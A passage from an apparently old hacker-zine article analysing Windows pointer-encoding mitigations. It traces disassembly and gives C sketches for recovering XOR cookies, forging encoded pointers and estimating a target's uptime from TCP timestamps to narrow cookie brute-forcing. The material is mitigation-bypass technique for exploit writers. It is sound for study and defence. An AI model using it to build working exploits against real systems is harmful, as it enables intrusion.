7C91AFD5 5D POP EBP
7C91AFD6 C2 0400 RETN 4
Obviously DecodeSystemPointer is exactly the same as EncodeSystemPointer, since
the function is basically a XOR of the pointer with a certain "magic value"
DWORD located at 0x7FFE0330. What lies there? Well, this is a certain value in
SharedUserData (_KUSER_SHARED_DATA), indeed, the SharedUserData region we
discussed in section [0x03]. As we can see, the value referred to in the
EncodeSystemPointer code is 0x7FFE0330, which is the base address of
SharedUserData + 0x330, which is the Cookie offset. This cookie is a magic value
which changes on reboot.
All processes have access to this Cookie, no matter what privileges. So local
attacks wouldn't be a problem since the exploit program would simply check the
value of *(DWORD*)(0x7ffe0330) and XOR the desired pointer overwrite address
with this cookie. Also, due to the static nature of this value during uptime,
eventually guessing it through bruteforce would be possible too.
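Because the scheme is a bare XOR, one known clear/encoded pair is enough to
recover the cookie, and the cookie is enough to forge any pointer. The sketch
below is plain integer arithmetic (no Windows calls; the function names are
mine). The sample values in the self-check are the ones from the EncodePointer
trace earlier in this section, which on this box uses the same XOR operation,
just with a per-process cookie.

```c
#include <assert.h>
#include <stdint.h>

/* XOR encode and decode are the same operation. */
uint32_t xor_encode(uint32_t ptr, uint32_t cookie)
{
    return ptr ^ cookie;
}

/* One known (clear, encoded) pair gives away the cookie. */
uint32_t recover_cookie(uint32_t clear_ptr, uint32_t encoded_ptr)
{
    return clear_ptr ^ encoded_ptr;
}

/* Value to overwrite the stored pointer with so that it decodes to 'target'. */
uint32_t forge_encoded(uint32_t target, uint32_t cookie)
{
    return target ^ cookie;
}

/* Self-check against the trace shown earlier in this section. */
void xor_cookie_selfcheck(void)
{
    uint32_t cookie = recover_cookie(0x00401290u, 0xC910C294u);

    assert(cookie == 0xC950D004u);
    /* The overwritten 0x41414141 "decoded" to 0x88119145 in the trace. */
    assert(xor_encode(0x41414141u, cookie) == 0x88119145u);
}
```

In a local attack against EncodeSystemPointer the cookie would simply be read
from 0x7ffe0330 instead of being recovered from a known pair.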
Now let us look at EncodePointer.
EncodePointer is located at 0x7C913917 on my box (the kernel32.dll export is
forwarded to ntdll.RtlEncodePointer):
Disassembly:
7C913917 > 8BFF MOV EDI,EDI
7C913919 55 PUSH EBP
7C91391A 8BEC MOV EBP,ESP
7C91391C 51 PUSH ECX
7C91391D 6A 00 PUSH 0
7C91391F 6A 04 PUSH 4
7C913921 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
7C913924 50 PUSH EAX
7C913925 6A 24 PUSH 24
7C913927 6A FF PUSH -1
7C913929 E8 EDA6FFFF CALL ntdll.ZwQueryInformationProcess
7C91392E 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
7C913931 3345 08 XOR EAX,DWORD PTR SS:[EBP+8]
7C913934 C9 LEAVE
7C913935 C2 0400 RETN 4
DecodePointer:
7C91393D > 8BFF MOV EDI,EDI
7C91393F 55 PUSH EBP
7C913940 8BEC MOV EBP,ESP
7C913942 5D POP EBP
7C913943 ^EB D2 JMP SHORT ntdll.RtlEncodePointer
As we can see, DecodePointer is once again simply EncodePointer. Now, what
EncodePointer does is pretty simple, it makes a call like:
ntdll.ZwQueryInformationProcess(-1,0x24,&Cookie,4,0)
where Cookie is the local variable at [ebp-4]. Note that the 24 pushed in the
disassembly is hexadecimal: information class 0x24 (36 decimal) is
ProcessCookie, not ProcessSessionInformation (which is class 24 decimal), and
0xFFFFFFFF == -1 is the CurrentProcess pseudo-handle. The returned value is
therefore a per-process cookie rather than a session ID. The ReactOS (open
source WinNT-compatible implementation) kernel source for
ZwQueryInformationProcess is a handy reference for how such information classes
are serviced.
Now this value is pretty tricky due to its very random nature, but apparently
it's constructed in the following manner upon process creation.
o The higher portion of the system tick count
(100 nano-second tick count since Jan 01, 1601) XOR
o The lower portion of the system tick count XOR
o The interrupt time (number of ticks during interrupts) XOR
o The number of system calls since system boot XOR
o The (ULONG)rdtsc CPU value XOR
o The memory manager page fault count
This result is then rotated right on encode using Cookie%(sizeof(ULONG_PTR)*8).
In pseudocode on a 32-bit CPU, encoding looks like this:
Ptrenc = (Ptrclear ^ Cookie) >>> (Cookie % 32)
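The pseudocode above can be written out in C as follows. This is only a sketch
of the described scheme for a 32-bit pointer, not a copy of any Microsoft code;
the helper names are mine, and the rotation helpers special-case a count of 0
because shifting a 32-bit value by 32 is undefined in C.

```c
#include <assert.h>
#include <stdint.h>

/* Rotate right by n bits (n taken modulo 32). */
uint32_t ror32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v >> n) | (v << (32 - n)) : v;
}

/* Rotate left by n bits (n taken modulo 32). */
uint32_t rol32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

/* Ptrenc = (Ptrclear ^ Cookie) >>> (Cookie % 32) */
uint32_t encode_ptr(uint32_t clear, uint32_t cookie)
{
    return ror32(clear ^ cookie, cookie % 32);
}

/* Undo the rotation first, then the XOR. */
uint32_t decode_ptr(uint32_t enc, uint32_t cookie)
{
    return rol32(enc, cookie % 32) ^ cookie;
}

/* Self-check with an example cookie whose low five bits equal 4. */
void rotate_selfcheck(void)
{
    assert(encode_ptr(0x00401290u, 0xC950D004u) == 0x4C910C29u);
    assert(decode_ptr(0x4C910C29u, 0xC950D004u) == 0x00401290u);
}
```

Note that, unlike the XOR-only variant, decoding is no longer the same operation
as encoding, so an attacker has to guess the rotation count as well as the bits
he wants to flip.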
The reason for the rotation is to make it harder to target partial pointer
overwrites, because target bits are in an unknown position in the encoded
pointer. Now we could simply bruteforce this value but there are ways to be more
efficient in our bruteforce. If we could determine any of the values used for
cookie generation, bruteforcing would be a tad easier: if, in
(w ^ x ^ y ^ z ^ a ^ b)
w and x are known (or approximated), it leaves us with less to bruteforce. Now,
we can attempt to determine these values remotely through uptime fingerprinting.
If we can determine the target machine's uptime, we can approximate the first
two values.
Locally determining the system uptime is possible by calling the
NtQuerySystemInformation native API with the SystemTimeOfDayInformation system
information class. This will return the system boot time in 100 nanosecond
intervals, from which determining the system uptime is trivial.
Remotely determining uptime is possible through the TCP Timestamps Option
(TSopt) described in RFC 1323. This is possible because the way operating
systems manage their TCP timestamping allows a remote client to guess, if he
recognizes the operating system through OS fingerprinting, the machine's
uptime. BSD, for example, increments the timestamp value by one point each 500
milliseconds. The optional TCP field looks like this:
1 1 4 4
+--------+-------------+-----------------------+--------------------------+
| Kind=8 | size=10 | TS Value (TSval) | TS Echo Reply (TSecr) |
+--------+-------------+-----------------------+--------------------------+
We need to keep in mind the following things though:
The length of a timestamp value in a TCP packet is 4 bytes, so it will roll over
when the value crosses the limit of 2^32. Also, Windows does not instantly start
to increase the timestamp once the system has been booted up. Nmap uses this
technique and does pretty well (for Windows as well, despite the aforementioned
issue), so if you're interested in implementing this as a function in your
exploit trying to beat EncodePointer secured applications, you should take a
look at nmap's uptime guessing routines.
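The core of such a routine is small. The sketch below is not nmap's code, just
an illustration of the idea under the assumption that the timestamp clock
started near zero at boot: sample TSval twice, derive the tick frequency, then
divide. Function names and the sampling interface are invented for this example.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Estimate the timestamp clock frequency (ticks per second) from two
 * TSval samples taken at local times t_a and t_b (in seconds).
 */
double ts_hz(uint32_t tsval_a, double t_a, uint32_t tsval_b, double t_b)
{
    assert(t_b > t_a);
    /* Unsigned subtraction stays correct across one 2^32 wraparound. */
    return (double)(uint32_t)(tsval_b - tsval_a) / (t_b - t_a);
}

/* Uptime estimate in seconds, assuming the counter started at 0 at boot. */
double uptime_secs(uint32_t tsval, double hz)
{
    assert(hz > 0.0);
    return (double)tsval / hz;
}
```

Two samples of 1000 and 1200 taken two seconds apart give 100 ticks per second
and an estimated uptime of 12 seconds. Since the counter may have wrapped or
started late, treat the result as a rough lower bound rather than an exact
value.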
The rdtsc CPU value is simply a timestamp counter which represents the count of
ticks from processor reset.
So if we manage to obtain the uptime, and we can safely assume uptime and
process creation time are close to each other, we can make an approximation of
at least 3 values remotely.
Now these techniques are not very accurate, but might help you exploit
applications employing pointer encoding.
--[ 0x05 ]------------------------------------------[ Greetings 'n shoutz ]-----
Greets and shouts go to Nullsec, the whole .aware/xzziroz community, The
HackThisSite collective, RRLF, 29A, The entire SmashTheStack crew, PullThePlug ,
BinaryShadow Organization, #dutch crew, Vx.netlux folks/Undernet VX crew,
blacksecurity and all "true" hackers out there.